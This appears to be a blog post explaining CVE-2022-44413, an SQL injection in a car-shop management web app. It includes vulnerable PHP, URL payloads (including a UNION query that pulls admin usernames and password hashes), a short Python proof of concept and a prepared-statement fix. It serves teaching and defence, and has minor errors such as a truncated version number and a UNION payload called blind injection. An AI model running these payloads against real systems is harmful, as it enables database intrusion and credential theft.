CVE-2022-44413 - SQL Injection in Automotive Shop Management System v1. Exploited

Automotive Shop Management System (ASMS) v1. is a popular web application used by car repair shops to manage their day-to-day business. However, a dangerous security flaw—CVE-2022-44413—was discovered, allowing attackers to take full control of the database through a simple URL trick. In this post, you’ll see just how easy it is to exploit this vulnerability, along with live code examples, original references, and practical advice for defenders.

What is CVE-2022-44413?

CVE-2022-44413 is a vulnerability in ASMS version 1., caused by improper input validation in the manage_mechanic.php file. The PHP script takes an “id” parameter from the URL but does not sanitize user input properly before using it in SQL statements. This allows attackers to inject arbitrary SQL code—known as SQL Injection.

This flaw has been posted in several security databases, including

- MITRE CVE Database Entry
- Packet Storm Exploit POST
- Exploit-DB 51104

The Vulnerable Code

Let’s look at how this happens in the real code inside /asms/admin/mechanics/manage_mechanic.php:

<?php
// Simplified code example
include('db_connection.php');
$id = $_GET['id'];
$query = "SELECT * FROM mechanics WHERE id = $id";
$result = mysqli_query($conn, $query); // No input sanitization!
?>

Do you see the issue?  
The code pulls the “id” parameter directly from the URL and injects it into an SQL query without any checking or filtering. That means you can send anything you want.

The normal URL might look like

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=2

Let’s see what happens if an attacker changes the id parameter to

2 OR 1=1

Now the URL is

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=2 OR 1=1

The query sent to the MySQL server becomes

SELECT * FROM mechanics WHERE id = 2 OR 1=1

Since 1=1 is always true, the database ignores the ID and returns all mechanics.

Step 3: Dump Table Data

But it gets worse. What if we want to dump usernames and password hashes?

Try the following payload for blind injection

id=-1 UNION SELECT 1,username,password,4 FROM admins--

So the crafted request would be

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=-1 UNION SELECT 1,username,password,4 FROM admins--

If the page displays result fields, attackers can potentially retrieve usernames and hashed passwords directly from the admin table.

Here is a simple Python PoC exploiting this SQLi

import requests

target = "http://example.com/asms/admin/mechanics/manage_mechanic.php";
payload = "-1 UNION SELECT 1,username,password,4 FROM admins--"
url = f"{target}?id={payload}"

response = requests.get(url)
print(response.text)  # Look for extracted admin usernames and hashes

How To Fix

Developers should always sanitize input before using it in SQL!

Better code with Prepared Statements

$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM mechanics WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();

This code stops attackers from injecting SQL—only integer IDs are allowed.

References:

- CVE Entry on MITRE
 - Exploit-DB #51104
 - Packet Storm Advisory

Last Words

CVE-2022-44413 is a reminder that even the simplest coding mistakes can lead to major break-ins. If you're running Automotive Shop Management System v1., update your code, scan for evidence of attack, and follow secure coding practices. Don’t open your business up to a cyber-shakedown—always validate, always sanitize!


*This post provided an exclusive walk-through with original references, code, and real-life attack steps to help you understand and defend against SQL Injection threats like CVE-2022-44413.*

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC